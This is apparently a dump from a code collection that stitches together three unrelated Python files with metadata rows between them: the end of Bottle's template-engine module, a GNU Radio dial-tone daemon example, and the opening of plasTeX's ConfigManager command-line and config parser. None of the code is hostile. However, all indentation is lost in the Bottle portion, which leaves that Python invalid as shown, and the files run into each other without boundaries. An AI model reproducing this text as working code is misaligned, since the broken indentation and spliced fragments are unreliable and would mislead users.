options.setdefault('format_exceptions', bool(DEBUG))
lookup = TemplateLookup(directories=self.lookup, **options)
if self.source:
self.tpl = Template(self.source, lookup=lookup, **options)
else:
self.tpl = Template(uri=self.name, filename=self.filename, lookup=lookup, **options)
def render(self, *args, **kwargs):
for dictarg in args: kwargs.update(dictarg)
_defaults = self.defaults.copy()
_defaults.update(kwargs)
return self.tpl.render(**_defaults)
class CheetahTemplate(BaseTemplate):
def prepare(self, **options):
from Cheetah.Template import Template
self.context = threading.local()
self.context.vars = {}
options['searchList'] = [self.context.vars]
if self.source:
self.tpl = Template(source=self.source, **options)
else:
self.tpl = Template(file=self.filename, **options)
def render(self, *args, **kwargs):
for dictarg in args: kwargs.update(dictarg)
self.context.vars.update(self.defaults)
self.context.vars.update(kwargs)
out = str(self.tpl)
self.context.vars.clear()
return out
class Jinja2Template(BaseTemplate):
def prepare(self, filters=None, tests=None, globals={}, **kwargs):
from jinja2 import Environment, FunctionLoader
if 'prefix' in kwargs: # TODO: to be removed after a while
raise RuntimeError('The keyword argument `prefix` has been removed. '
'Use the full jinja2 environment name line_statement_prefix instead.')
self.env = Environment(loader=FunctionLoader(self.loader), **kwargs)
if filters: self.env.filters.update(filters)
if tests: self.env.tests.update(tests)
if globals: self.env.globals.update(globals)
if self.source:
self.tpl = self.env.from_string(self.source)
else:
self.tpl = self.env.get_template(self.filename)
def render(self, *args, **kwargs):
for dictarg in args: kwargs.update(dictarg)
_defaults = self.defaults.copy()
_defaults.update(kwargs)
return self.tpl.render(**_defaults)
def loader(self, name):
fname = self.search(name, self.lookup)
if not fname: return
with open(fname, "rb") as f:
return f.read().decode(self.encoding)
class SimpleTemplate(BaseTemplate):
def prepare(self, escape_func=html_escape, noescape=False, syntax=None, **ka):
self.cache = {}
enc = self.encoding
self._str = lambda x: touni(x, enc)
self._escape = lambda x: escape_func(touni(x, enc))
self.syntax = syntax
if noescape:
self._str, self._escape = self._escape, self._str
@cached_property
def co(self):
return compile(self.code, self.filename or '<string>', 'exec')
@cached_property
def code(self):
source = self.source
if not source:
with open(self.filename, 'rb') as f:
source = f.read()
try:
source, encoding = touni(source), 'utf8'
except UnicodeError:
depr('Template encodings other than utf8 are no longer supported.') #0.11
source, encoding = touni(source, 'latin1'), 'latin1'
parser = StplParser(source, encoding=encoding, syntax=self.syntax)
code = parser.translate()
self.encoding = parser.encoding
return code
def _rebase(self, _env, _name=None, **kwargs):
if _name is None:
depr('Rebase function called without arguments.'
' You were probably looking for {{base}}?', True) #0.12
_env['_rebase'] = (_name, kwargs)
def _include(self, _env, _name=None, **kwargs):
if _name is None:
            depr('Include function called without arguments.'
' You were probably looking for {{base}}?', True) #0.12
env = _env.copy()
env.update(kwargs)
if _name not in self.cache:
self.cache[_name] = self.__class__(name=_name, lookup=self.lookup)
return self.cache[_name].execute(env['_stdout'], env)
def execute(self, _stdout, kwargs):
env = self.defaults.copy()
env.update(kwargs)
env.update({'_stdout': _stdout, '_printlist': _stdout.extend,
'include': functools.partial(self._include, env),
'rebase': functools.partial(self._rebase, env), '_rebase': None,
'_str': self._str, '_escape': self._escape, 'get': env.get,
'setdefault': env.setdefault, 'defined': env.__contains__ })
eval(self.co, env)
if env.get('_rebase'):
subtpl, rargs = env.pop('_rebase')
rargs['base'] = ''.join(_stdout) #copy stdout
del _stdout[:] # clear stdout
return self._include(env, subtpl, **rargs)
return env
def render(self, *args, **kwargs):
""" Render the template using keyword arguments as local variables. """
env = {}; stdout = []
for dictarg in args: env.update(dictarg)
env.update(kwargs)
self.execute(stdout, env)
return ''.join(stdout)
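# Illustrative example (editor's note; not part of the original module):
#   SimpleTemplate('Hello {{name}}!').render(name='World')  -> 'Hello World!'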
class StplSyntaxError(TemplateError): pass
class StplParser(object):
''' Parser for stpl templates. '''
_re_cache = {} #: Cache for compiled re patterns
    # This huge pile of voodoo magic splits python code into 10 different tokens.
# 1: All kinds of python strings (trust me, it works)
_re_tok = '([urbURB]?(?:\'\'(?!\')|""(?!")|\'{6}|"{6}' \
'|\'(?:[^\\\\\']|\\\\.)+?\'|"(?:[^\\\\"]|\\\\.)+?"' \
'|\'{3}(?:[^\\\\]|\\\\.|\\n)+?\'{3}' \
'|"{3}(?:[^\\\\]|\\\\.|\\n)+?"{3}))'
_re_inl = _re_tok.replace('|\\n','') # We re-use this string pattern later
# 2: Comments (until end of line, but not the newline itself)
_re_tok += '|(#.*)'
# 3,4: Open and close grouping tokens
_re_tok += '|([\\[\\{\\(])'
_re_tok += '|([\\]\\}\\)])'
# 5,6: Keywords that start or continue a python block (only start of line)
_re_tok += '|^([ \\t]*(?:if|for|while|with|try|def|class)\\b)' \
'|^([ \\t]*(?:elif|else|except|finally)\\b)'
# 7: Our special 'end' keyword (but only if it stands alone)
_re_tok += '|((?:^|;)[ \\t]*end[ \\t]*(?=(?:%(block_close)s[ \\t]*)?\\r?$|;|#))'
# 8: A customizable end-of-code-block template token (only end of line)
_re_tok += '|(%(block_close)s[ \\t]*(?=\\r?$))'
# 9: And finally, a single newline. The 10th token is 'everything else'
_re_tok += '|(\\r?\\n)'
# Match the start tokens of code areas in a template
_re_split = '(?m)^[ \t]*(\\\\?)((%(line_start)s)|(%(block_start)s))(%%?)'
# Match inline statements (may contain python strings)
_re_inl = '(?m)%%(inline_start)s((?:%s|[^\'"\n]*?)+)%%(inline_end)s' % _re_inl
_re_tok = '(?m)' + _re_tok
default_syntax = '<% %> % {{ }}'
def __init__(self, source, syntax=None, encoding='utf8'):
self.source, self.encoding = touni(source, encoding), encoding
self.set_syntax(syntax or self.default_syntax)
self.code_buffer, self.text_buffer = [], []
self.lineno, self.offset = 1, 0
self.indent, self.indent_mod = 0, 0
self.paren_depth = 0
def get_syntax(self):
''' Tokens as a space separated string (default: <% %> % {{ }}) '''
return self._syntax
def set_syntax(self, syntax):
self._syntax = syntax
self._tokens = syntax.split()
if not syntax in self._re_cache:
names = 'block_start block_close line_start inline_start inline_end'
etokens = map(re.escape, self._tokens)
pattern_vars = dict(zip(names.split(), etokens))
patterns = (self._re_split, self._re_tok, self._re_inl)
patterns = [re.compile(p%pattern_vars) for p in patterns]
self._re_cache[syntax] = patterns
self.re_split, self.re_tok, self.re_inl = self._re_cache[syntax]
syntax = property(get_syntax, set_syntax)
def translate(self):
if self.offset: raise RuntimeError('Parser is a one time instance.')
while True:
m = self.re_split.search(self.source[self.offset:])
if m:
text = self.source[self.offset:self.offset+m.start()]
self.text_buffer.append(text)
self.offset += m.end()
if m.group(1): # New escape syntax
line, sep, _ = self.source[self.offset:].partition('\n')
self.text_buffer.append(m.group(2)+m.group(5)+line+sep)
self.offset += len(line+sep)+1
continue
elif m.group(5): # Old escape syntax
depr('Escape code lines with a backslash.') #0.12
line, sep, _ = self.source[self.offset:].partition('\n')
self.text_buffer.append(m.group(2)+line+sep)
self.offset += len(line+sep)+1
continue
self.flush_text()
self.read_code(multiline=bool(m.group(4)))
else: break
self.text_buffer.append(self.source[self.offset:])
self.flush_text()
return ''.join(self.code_buffer)
def read_code(self, multiline):
code_line, comment = '', ''
while True:
m = self.re_tok.search(self.source[self.offset:])
if not m:
code_line += self.source[self.offset:]
self.offset = len(self.source)
self.write_code(code_line.strip(), comment)
return
code_line += self.source[self.offset:self.offset+m.start()]
self.offset += m.end()
_str, _com, _po, _pc, _blk1, _blk2, _end, _cend, _nl = m.groups()
if (code_line or self.paren_depth > 0) and (_blk1 or _blk2): # a if b else c
code_line += _blk1 or _blk2
continue
if _str: # Python string
code_line += _str
elif _com: # Python comment (up to EOL)
comment = _com
if multiline and _com.strip().endswith(self._tokens[1]):
multiline = False # Allow end-of-block in comments
elif _po: # open parenthesis
self.paren_depth += 1
code_line += _po
elif _pc: # close parenthesis
if self.paren_depth > 0:
# we could check for matching parentheses here, but it's
# easier to leave that to python - just check counts
self.paren_depth -= 1
code_line += _pc
elif _blk1: # Start-block keyword (if/for/while/def/try/...)
code_line, self.indent_mod = _blk1, -1
self.indent += 1
elif _blk2: # Continue-block keyword (else/elif/except/...)
code_line, self.indent_mod = _blk2, -1
elif _end: # The non-standard 'end'-keyword (ends a block)
self.indent -= 1
elif _cend: # The end-code-block template token (usually '%>')
if multiline: multiline = False
else: code_line += _cend
else: # \n
self.write_code(code_line.strip(), comment)
self.lineno += 1
code_line, comment, self.indent_mod = '', '', 0
if not multiline:
break
def flush_text(self):
text = ''.join(self.text_buffer)
del self.text_buffer[:]
if not text: return
parts, pos, nl = [], 0, '\\\n'+' '*self.indent
for m in self.re_inl.finditer(text):
prefix, pos = text[pos:m.start()], m.end()
if prefix:
parts.append(nl.join(map(repr, prefix.splitlines(True))))
if prefix.endswith('\n'): parts[-1] += nl
parts.append(self.process_inline(m.group(1).strip()))
if pos < len(text):
prefix = text[pos:]
lines = prefix.splitlines(True)
if lines[-1].endswith('\\\\\n'): lines[-1] = lines[-1][:-3]
elif lines[-1].endswith('\\\\\r\n'): lines[-1] = lines[-1][:-4]
parts.append(nl.join(map(repr, lines)))
code = '_printlist((%s,))' % ', '.join(parts)
self.lineno += code.count('\n')+1
self.write_code(code)
def process_inline(self, chunk):
if chunk[0] == '!': return '_str(%s)' % chunk[1:]
return '_escape(%s)' % chunk
def write_code(self, line, comment=''):
line, comment = self.fix_backward_compatibility(line, comment)
code = ' ' * (self.indent+self.indent_mod)
code += line.lstrip() + comment + '\n'
self.code_buffer.append(code)
def fix_backward_compatibility(self, line, comment):
parts = line.strip().split(None, 2)
if parts and parts[0] in ('include', 'rebase'):
depr('The include and rebase keywords are functions now.') #0.12
if len(parts) == 1: return "_printlist([base])", comment
elif len(parts) == 2: return "_=%s(%r)" % tuple(parts), comment
else: return "_=%s(%r, %s)" % tuple(parts), comment
if self.lineno <= 2 and not line.strip() and 'coding' in comment:
m = re.match(r"#.*coding[:=]\s*([-\w.]+)", comment)
if m:
depr('PEP263 encoding strings in templates are deprecated.') #0.12
enc = m.group(1)
self.source = self.source.encode(self.encoding).decode(enc)
self.encoding = enc
return line, comment.replace('coding','coding*')
return line, comment
def template(*args, **kwargs):
'''
Get a rendered template as a string iterator.
You can use a name, a filename or a template string as first parameter.
Template rendering arguments can be passed as dictionaries
or directly (as keyword arguments).
'''
tpl = args[0] if args else None
adapter = kwargs.pop('template_adapter', SimpleTemplate)
lookup = kwargs.pop('template_lookup', TEMPLATE_PATH)
tplid = (id(lookup), tpl)
if tplid not in TEMPLATES or DEBUG:
settings = kwargs.pop('template_settings', {})
if isinstance(tpl, adapter):
TEMPLATES[tplid] = tpl
if settings: TEMPLATES[tplid].prepare(**settings)
elif "\n" in tpl or "{" in tpl or "%" in tpl or '$' in tpl:
TEMPLATES[tplid] = adapter(source=tpl, lookup=lookup, **settings)
else:
TEMPLATES[tplid] = adapter(name=tpl, lookup=lookup, **settings)
if not TEMPLATES[tplid]:
abort(500, 'Template (%s) not found' % tpl)
for dictarg in args[1:]: kwargs.update(dictarg)
return TEMPLATES[tplid].render(kwargs)
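# Illustrative example (editor's note; the template file name is hypothetical):
#   template('Hello {{name}}!', name='World')  -> 'Hello World!'
#   template('hello_page', name='World')       # looks up hello_page(.tpl) on TEMPLATE_PATH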
mako_template = functools.partial(template, template_adapter=MakoTemplate)
cheetah_template = functools.partial(template, template_adapter=CheetahTemplate)
jinja2_template = functools.partial(template, template_adapter=Jinja2Template)
def view(tpl_name, **defaults):
''' Decorator: renders a template for a handler.
The handler can control its behavior like that:
- return a dict of template vars to fill out the template
- return something other than a dict and the view decorator will not
process the template, but return the handler result as is.
This includes returning a HTTPResponse(dict) to get,
for instance, JSON with autojson or other castfilters.
'''
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
result = func(*args, **kwargs)
if isinstance(result, (dict, DictMixin)):
tplvars = defaults.copy()
tplvars.update(result)
return template(tpl_name, **tplvars)
elif result is None:
return template(tpl_name, defaults)
return result
return wrapper
return decorator
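# Illustrative usage (editor's note; route and template names are hypothetical):
#   @route('/hello')
#   @view('hello_page')
#   def hello():
#       return dict(name='World')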
mako_view = functools.partial(view, template_adapter=MakoTemplate)
cheetah_view = functools.partial(view, template_adapter=CheetahTemplate)
jinja2_view = functools.partial(view, template_adapter=Jinja2Template)
###############################################################################
# Constants and Globals ########################################################
###############################################################################
TEMPLATE_PATH = ['./', './views/']
TEMPLATES = {}
DEBUG = False
NORUN = False # If set, run() does nothing. Used by load_app()
#: A dict to map HTTP status codes (e.g. 404) to phrases (e.g. 'Not Found')
HTTP_CODES = httplib.responses
HTTP_CODES[418] = "I'm a teapot" # RFC 2324
HTTP_CODES[422] = "Unprocessable Entity" # RFC 4918
HTTP_CODES[428] = "Precondition Required"
HTTP_CODES[429] = "Too Many Requests"
HTTP_CODES[431] = "Request Header Fields Too Large"
HTTP_CODES[511] = "Network Authentication Required"
_HTTP_STATUS_LINES = dict((k, '%d %s'%(k,v)) for (k,v) in HTTP_CODES.items())
#: The default template used for error pages. Override with @error()
ERROR_PAGE_TEMPLATE = """
%%try:
%%from %s import DEBUG, HTTP_CODES, request, touni
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: {{e.status}}</title>
<style type="text/css">
html {background-color: #eee; font-family: sans;}
body {background-color: #fff; border: 1px solid #ddd;
padding: 15px; margin: 15px;}
pre {background-color: #eee; border: 1px solid #ddd; padding: 5px;}
</style>
</head>
<body>
<h1>Error: {{e.status}}</h1>
<p>Sorry, the requested URL <tt>{{repr(request.url)}}</tt>
caused an error:</p>
<pre>{{e.body}}</pre>
%%if DEBUG and e.exception:
<h2>Exception:</h2>
<pre>{{repr(e.exception)}}</pre>
%%end
%%if DEBUG and e.traceback:
<h2>Traceback:</h2>
<pre>{{e.traceback}}</pre>
%%end
</body>
</html>
%%except ImportError:
<b>ImportError:</b> Could not generate the error page. Please add bottle to
the import path.
%%end
""" % __name__
#: A thread-safe instance of :class:`LocalRequest`. If accessed from within a
#: request callback, this instance always refers to the *current* request
#: (even on a multithreaded server).
request = LocalRequest()
#: A thread-safe instance of :class:`LocalResponse`. It is used to change the
#: HTTP response for the *current* request.
response = LocalResponse()
#: A thread-safe namespace. Not used by Bottle.
local = threading.local()
# Initialize app stack (create first empty Bottle app)
# BC: 0.6.4 and needed for run()
app = default_app = AppStack()
app.push()
#: A virtual package that redirects import statements.
#: Example: ``import bottle.ext.sqlite`` actually imports `bottle_sqlite`.
ext = _ImportRedirect('bottle.ext' if __name__ == '__main__' else __name__+".ext", 'bottle_%s').module
if __name__ == '__main__':
opt, args, parser = _cmd_options, _cmd_args, _cmd_parser
if opt.version:
_stdout('Bottle %s\n'%__version__)
sys.exit(0)
if not args:
parser.print_help()
_stderr('\nError: No application specified.\n')
sys.exit(1)
sys.path.insert(0, '.')
sys.modules.setdefault('bottle', sys.modules['__main__'])
host, port = (opt.bind or 'localhost'), 8080
if ':' in host and host.rfind(']') < host.rfind(':'):
host, port = host.rsplit(':', 1)
host = host.strip('[]')
run(args[0], host=host, port=int(port), server=opt.server,
reloader=opt.reload, plugins=opt.plugin, debug=opt.debug)
# THE END
| gpl-3.0 | -3,736,979,175,166,978,000 | 38.931053 | 103 | 0.578377 | false |
douggeiger/gnuradio | gr-audio/examples/python/dial_tone_daemon.py | 58 | 2196 | #!/usr/bin/env python
#
# Copyright 2004,2005,2007,2008,2012 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, gru
from gnuradio import audio
from gnuradio.eng_option import eng_option
from optparse import OptionParser
import os
import sys
try:
from gnuradio import analog
except ImportError:
sys.stderr.write("Error: Program requires gr-analog.\n")
sys.exit(1)
class my_top_block(gr.top_block):
def __init__(self):
gr.top_block.__init__(self)
parser = OptionParser(option_class=eng_option)
parser.add_option("-O", "--audio-output", type="string", default="",
help="pcm output device name. E.g., hw:0,0 or /dev/dsp")
parser.add_option("-r", "--sample-rate", type="eng_float", default=48000,
help="set sample rate to RATE (48000)")
(options, args) = parser.parse_args()
if len(args) != 0:
parser.print_help()
raise SystemExit, 1
sample_rate = int(options.sample_rate)
ampl = 0.1
src0 = analog.sig_source_f(sample_rate, analog.GR_SIN_WAVE, 350, ampl)
src1 = analog.sig_source_f(sample_rate, analog.GR_SIN_WAVE, 440, ampl)
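        # 350 Hz + 440 Hz is the standard North American dial tone pair.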
dst = audio.sink(sample_rate, options.audio_output)
self.connect(src0, (dst, 0))
self.connect(src1, (dst, 1))
if __name__ == '__main__':
pid = gru.daemonize()
print "To stop this program, enter 'kill %d'" % pid
my_top_block().run()
| gpl-3.0 | -6,660,296,773,033,275,000 | 34.419355 | 83 | 0.65847 | false |
mungerd/plastex | plasTeX/ConfigManager/__init__.py | 7 | 60231 | #!/usr/bin/env python
"""
ConfigManager
ConfigManager is a combination command-line option parser and configuration
file. It essentially combines ConfigParser, getopt, and a lot of
additional logic to parse the command-line the way you expect it to be
parsed. The ConfigManager class should be backwards compatible with the
ConfigParser class, but contains much more functionality and a more natural
dictionary-style interface to sections and options.
See examples at the bottom of this file. Try typing __init__.py
followed by a bunch of imaginary command line options and arguments.
"""
import sys, string, re, urllib, copy, types, os
from plasTeX.dictutils import ordereddict
from UserList import UserList
from UserDict import UserDict
from textwrap import wrap
__all__ = ['ConfigManager','BooleanOption','IntegerOption','CompoundOption',
'MultiOption','GenericOption','FloatOption','StringOption',
'InputFileOption','OutputFileOption','InputDirectoryOption',
'OutputDirectoryOption','CountedOption',
'BooleanArgument','IntegerArgument','CompoundArgument',
'MultiArgument','GenericArgument','FloatArgument','StringArgument',
'InputFileArgument','OutputFileArgument','InputDirectoryArgument',
'OutputDirectoryArgument','CountedArgument',
'BUILTIN','CODE','REGISTRY','CONFIG','CONFIGFILE','ENVIRON',
'ENVIRONMENT','COMMANDLINE','ALL','DEFAULTSECT',
'ON','OFF','TRUE','FALSE','YES','NO','CommandLineManager',
'GetoptError','ConfigError','NoOptionError']
DEFAULTSECT = "DEFAULT"
MAX_INTERPOLATION_DEPTH = 10
ON = TRUE = YES = 1
OFF = FALSE = NO = 0
TERMINAL_WIDTH = 76 # Maximum width of terminal
MAX_NAME_WIDTH_RATIO = 0.25 # Max fraction of terminal to use for option
PREPAD = 2 # Padding before each option name in usage
GUTTER = 4 # Space between option name and description in usage
# Possible values for `source'.
BUILTIN = 2
CODE = 4
REGISTRY = 8
CONFIG = CONFIGFILE = 16
ENVIRON = ENVIRONMENT = 32
COMMANDLINE = 64
ALL = 0xffffff
# Exception classes
class Error(Exception):
""" Generic exception """
def __init__(self, msg=''):
self.msg = msg
Exception.__init__(self, msg)
def __str__(self):
return self.msg
__repr__ = __str__
# Exceptions while parsing command line
class GetoptError(Error):
""" Generic command line exception """
def __init__(self, msg, opt):
self.msg = msg
self.opt = opt
Exception.__init__(self, msg, opt)
def __str__(self):
return self.msg
__repr__ = __str__
class RequiresArgument(GetoptError):
""" Exception for a missing argument """
class MandatoryOption(GetoptError):
""" Exception for a missing option """
class UnspecifiedArgument(GetoptError):
""" Exception for an argument when none was expected """
class UnrecognizedArgument(GetoptError):
""" Exception for an argument that is unrecognized """
class NonUniquePrefix(GetoptError):
""" Exception for multiple option prefixes that match a given option """
class UnknownCompoundGroup(GetoptError):
""" Exception for an unknown grouping character used for a compound """
def __init__(self, msg=''):
GetoptError.__init__(self, msg, '')
# Exceptions while reading/parsing configuration files
class ConfigError(Error):
""" Generic configuration file exception """
class NoSectionError(ConfigError):
""" Exception for missing sections """
def __init__(self, section):
ConfigError.__init__(self, 'No section: %s' % section)
self.section = section
class DuplicateSectionError(ConfigError):
""" Exception for duplicate sections """
def __init__(self, section):
ConfigError.__init__(self, "Section %s already exists" % section)
self.section = section
class InvalidOptionError(GetoptError, ConfigError):
""" Exception for invalid values for a given option """
def __init__(self, option, value, msg='', type=''):
if type: type += ' '
if not msg:
msg="Invalid value for %soption `%s'" % (type, option)
ConfigError.__init__(self, msg+': %s' % value)
self.option = option
self.value = value
class NoOptionError(ConfigError):
""" Exception for missing a missing option in a section """
def __init__(self, option, section):
ConfigError.__init__(self, "No option `%s' in section: %s" %
(option, section))
self.option = option
self.section = section
class InterpolationError(ConfigError):
""" Exception for message interpolation errors """
def __init__(self, reference, option, section, rawval):
ConfigError.__init__(self,
"Bad value substitution:\n"
"\tsection: [%s]\n"
"\toption : %s\n"
"\tkey : %s\n"
"\trawval : %s\n"
% (section, option, reference, rawval))
self.reference = reference
self.option = option
self.section = section
class InterpolationDepthError(ConfigError):
""" Exception for excessive recursion in interpolation """
def __init__(self, option, section, rawval):
ConfigError.__init__(self,
"Value interpolation too deeply recursive:\n"
"\tsection: [%s]\n"
"\toption : %s\n"
"\trawval : %s\n"
% (section, option, rawval))
self.option = option
self.section = section
class ParsingError(ConfigError):
""" Exception for errors occurring during parsing of a config file """
def __init__(self, filename):
ConfigError.__init__(self, 'File contains parsing errors: %s' % filename)
self.filename = filename
self.errors = []
def append(self, lineno, line):
self.errors.append((lineno, line))
self.msg = self.msg + '\n\t[line %2d]: %s' % (lineno, line)
class TooFewValues(GetoptError):
""" Got fewer values than expected """
def __init__(self, msg):
GetoptError.__init__(self, msg, '')
class TooManyValues(GetoptError):
""" Got more values than expected """
def __init__(self, msg):
GetoptError.__init__(self, msg, '')
class MissingSectionHeaderError(ParsingError):
""" Exception for options that occur before a section heading """
def __init__(self, filename, lineno, line):
ConfigError.__init__(
self,
'File contains no section headers.\nfile: %s, line: %d\n%s' %
(filename, lineno, line))
self.filename = filename
self.lineno = lineno
self.line = line
class ConfigSection(UserDict, object):
""" Section of a configuration object """
def __init__(self, name, data={}):
"""
Initialize the section
Required Arguments:
name -- name of the section
data -- dictionary containing the initial set of options
"""
UserDict.__init__(self, data)
self.name = name
self.parent = None
def copy(self):
""" Make a deep copy of self """
newcopy = self.__class__(self.name)
for key, value in vars(self).items():
if key == 'data': continue
setattr(newcopy, key, value)
for key, value in self.data.items():
newcopy.data[key] = value.copy()
return newcopy
def setParent(self, parent):
""" Set the parent ConfigManager instance """
self.parent = parent
def defaults(self):
""" Return the dictionary of defaults """
return self.parent.defaults()
def __getitem__(self, key):
""" Return the value of the option, not the option itself """
return self.get(key)
def set(self, option, value, source=BUILTIN):
"""
Create the appropriate option type
If the value is already an Option instance, just plug it in.
If the value is anything else, try to figure out which option
type it corresponds to and create an option of that type.
Required Arguments:
option -- dictionary key where the option should be set
value -- option value to store
source -- flag to indicate source of option
Returns: None
"""
typemap = {str:StringOption, int:IntegerOption,
float:FloatOption, list:MultiOption, tuple:MultiOption}
if self.data.has_key(option):
if self.data[option].source <= source:
self.data[option].source = source
self.data[option].setValue(value)
else:
if isinstance(value, GenericOption):
value.setParent(self)
value.name = str(option)
self.data[option] = value
elif type(value) in typemap.keys():
for key, opttype in typemap.items():
if isinstance(value, key):
# Handle booleans this way until support for
# true booleans shows up in Python.
if type(value) == str and \
str(value).lower().strip() in ['on','off','true','false','yes','no']:
opttype = BooleanOption
self.data[option] = opttype(name=option, source=source)
self.data[option].setParent(self)
self.data[option].name = str(option)
self.data[option].setValue(value)
break
else:
raise TypeError, \
'Could not find valid option type for "%s"' % value
def __setitem__(self, key, value):
""" Set the item in the dictionary """
self.set(key, value, source=BUILTIN)
def getint(self, option):
""" Get the option value and cast it to an integer """
return int(self[option])
def getfloat(self, option):
""" Get the option value and cast it to a float """
return float(self[option])
def getboolean(self, option):
""" Get the option value and cast it to a boolean """
v = self[option]
val = int(v)
if val not in (0, 1):
raise ValueError, 'Not a boolean: %s' % v
return val
def get(self, option, raw=0, vars={}):
"""
Get an option value for a given section.
All % interpolations are expanded in the return values, based on the
defaults passed into the constructor, unless the optional argument
`raw' is true. Additional substitutions may be provided using the
`vars' argument, which must be a dictionary whose contents overrides
any pre-existing defaults.
Required Arguments:
option -- name of the option to retrieve
Keyword Arguments:
raw -- boolean flag that indicates whether string values should
be returned as a raw value or as a string with all variable
interpolation applied
vars -- dictionary of values to use in string interpolation
Returns:
value of the option
"""
value = self.getraw(option, vars)
# Raw was specified
if raw or value == None: return value
# If we have a list, see if any strings need interpolation.
if type(value) in [list, tuple]:
strings = [s for s in value
if isinstance(s,str) and s.find('%(')+1]
if not strings: return value
# If we have a string, but no interpolation is needed, bail out.
elif not(isinstance(value,str)) or value.find("%(") < 0:
return value
# otherwise needs interpolation...
var_dict = self.defaults().data.copy()
var_dict.update(self.data)
var_dict.update(vars)
# Handle lists of interpolations as well as single values.
if type(value) in [list, tuple]:
new_values = []
for i in value:
new_values.append(self.interpolate(option, var_dict, i))
return new_values
else:
return self.interpolate(option, var_dict, value)
def interpolate(self, option, vars, rawval):
"""
Do the string interpolation
Required Arguments:
option -- name of the option
vars -- dictionary of values to use in interpolation
rawval -- raw value of the option
Returns:
string -- string with all variables interpolated
"""
value = rawval
depth = 0
# Loop through this until it's done
while depth < MAX_INTERPOLATION_DEPTH:
depth = depth + 1
if value.find("%(") >= 0:
try:
value = value % vars
except KeyError, key:
raise InterpolationError(key, option, self.name, rawval)
else:
break
if value.find("%(") >= 0:
raise InterpolationDepthError(option, self.name, rawval)
return value
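    # Illustrative example of interpolate() (editor's note; values are hypothetical):
    #   vars = {'home': '/usr/local'}
    #   self.interpolate('bin', vars, '%(home)s/bin')  -> '/usr/local/bin'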
def getraw(self, option, vars={}):
"""
Return raw value of option
Required Arguments:
option -- name of the option to retrieve
Keyword Arguments:
vars -- dictionary containing additional default values
"""
if vars.has_key(option):
return vars[option].getValue()
if self.has_key(option):
return self.data[option].getValue()
defaults = self.defaults()
if defaults.has_key(option):
return defaults.data[option].getValue()
raise NoOptionError(option, self.name)
def to_string(self, source=COMMANDLINE):
"""
Convert the section back into INI format
Keyword Arguments:
source -- flag which indicates which source of information to print
Returns:
string -- string containing the section in INI format
"""
s = ''
keys = self.keys()
keys.sort()
for key in keys:
if source & self.data[key].source:
raw = self.getraw(key)
option = self.data[key]
# Bypass unset options
if isinstance(option, MultiOption) and raw == []: continue
if raw == None: continue
# Print description or summary of the option as well
comment = ''
if option.summary: comment = option.summary
if option.description: comment = option.description
if comment:
comment = comment.strip() % option.names()
comment = comment.split('\n')
s += '\n; %s\n' % '\n; '.join(comment)
value = str(option).replace('\n', '\n ')
if value.find('\n') + 1: value = '\n ' + value
s += "%s %s %s\n" % (key, ConfigManager.OPTIONSEP, value)
return s
def __str__(self):
""" Return section in INI format without builtins """
return self.to_string()
def __repr__(self):
""" Return section in INI format with builtins """
return self.to_string(ALL)
class ConfigManager(UserDict, object):
# Regular expressions for parsing section headers and options.
SECTCRE = re.compile(
r'\[' # [
r'(?P<header>[^]]+)' # very permissive!
r'\]' # ]
)
OPTCRE = re.compile(
r'(?P<option>[]\-[\w_.*,(){}]+)' # a lot of stuff found by IvL
r'[ \t]*(?P<vi>[:=])[ \t]*' # any number of space/tab,
# followed by separator
# (either : or =), followed
# by any # space/tab
r'(?P<value>.*)$' # everything up to eol
)
# Option separator used in printing out INI format
OPTIONSEP = '='
# Set prefixes for options. If these are the same, all options
# are treated as long options. You can set either one to None
# to turn that type of option off as well.
short_prefix = '-'
long_prefix = '--'
def __init__(self, defaults={}):
"""
Initialize ConfigManager
Keyword Arguments:
defaults -- dictionary of default values. These values will
make up the section by the name DEFAULTSECT.
"""
UserDict.__init__(self)
self[DEFAULTSECT] = ConfigSection(DEFAULTSECT, defaults)
self.strict = 1 # Raise exception for unknown options
self._categories = {} # Dictionary of option categories
self.unrecognized = []
def copy(self):
""" Make a deep copy of self """
newcopy = self.__class__()
for key, value in vars(self).items():
if key == 'data': continue
setattr(newcopy, key, value)
for key, value in self.data.items():
newcopy.data[key] = value.copy()
return newcopy
def set_prefixes(cls, arg1, arg2=None):
"""
Set the command-line option prefixes
Arguments:
short - prefix to use for short command-line options. If this
is set to 'None', then all options are treated as long options.
long - prefix to use for long options
"""
if arg1 == arg2 == None:
raise ValueError, 'Short and long prefixes cannot both be None.'
if arg2 is None:
cls.long_prefix = arg1
cls.short_prefix = None
else:
cls.long_prefix = arg2
cls.short_prefix = arg1
set_prefixes = classmethod(set_prefixes)
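    # Illustrative examples (editor's note):
    #   ConfigManager.set_prefixes('-', '--')  # short and long option prefixes
    #   ConfigManager.set_prefixes('/')        # single prefix; all options are long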
def add_help_on_option(self, category=None):
"""
Add a --help-on=LIST option for displaying specific option help
The --help-on= option can be added to give the command line
interactive help. For example, if you had an option called
'--debug', you could type '--help-on debug' to get the full
description of the --debug option printed out.
Keyword Arguments:
category -- category to put the --help-on option in
"""
self[DEFAULTSECT]['__help_on__'] = MultiOption(
""" Display help on listed option names """,
options = '%shelp-on' % self.long_prefix[0],
category = category,
callback = self.usage_on,
)
def remove_help_on_option(self):
""" Remove the --help-on option """
try: del self[DEFAULTSECT]['__help_on__']
except: pass
def add_category(self, key, title):
"""
Add a category to the ConfigManager
Options can be grouped by categories for display in the usage
message. Categories have both a key and a title. The key is
what is used in the 'category' parameter when instantiating an
option. The title is the heading to print in the usage message.
Required Arguments:
key -- name of the category used in instantiating an option
title -- title of the category to print in the usage message
Returns:
string -- the same key given as the first argument
"""
# if not self._categories:
# self._categories['__categories__'] = 'Help Categories'
# if not self.has_key('__categories__'):
# self.add_section('__categories__')
# self['__categories__'][key] = BooleanOption(title,
# options='%shelp-%s' % (self.long_prefix, key),
# category='__categories__')
self._categories[key] = title
return key
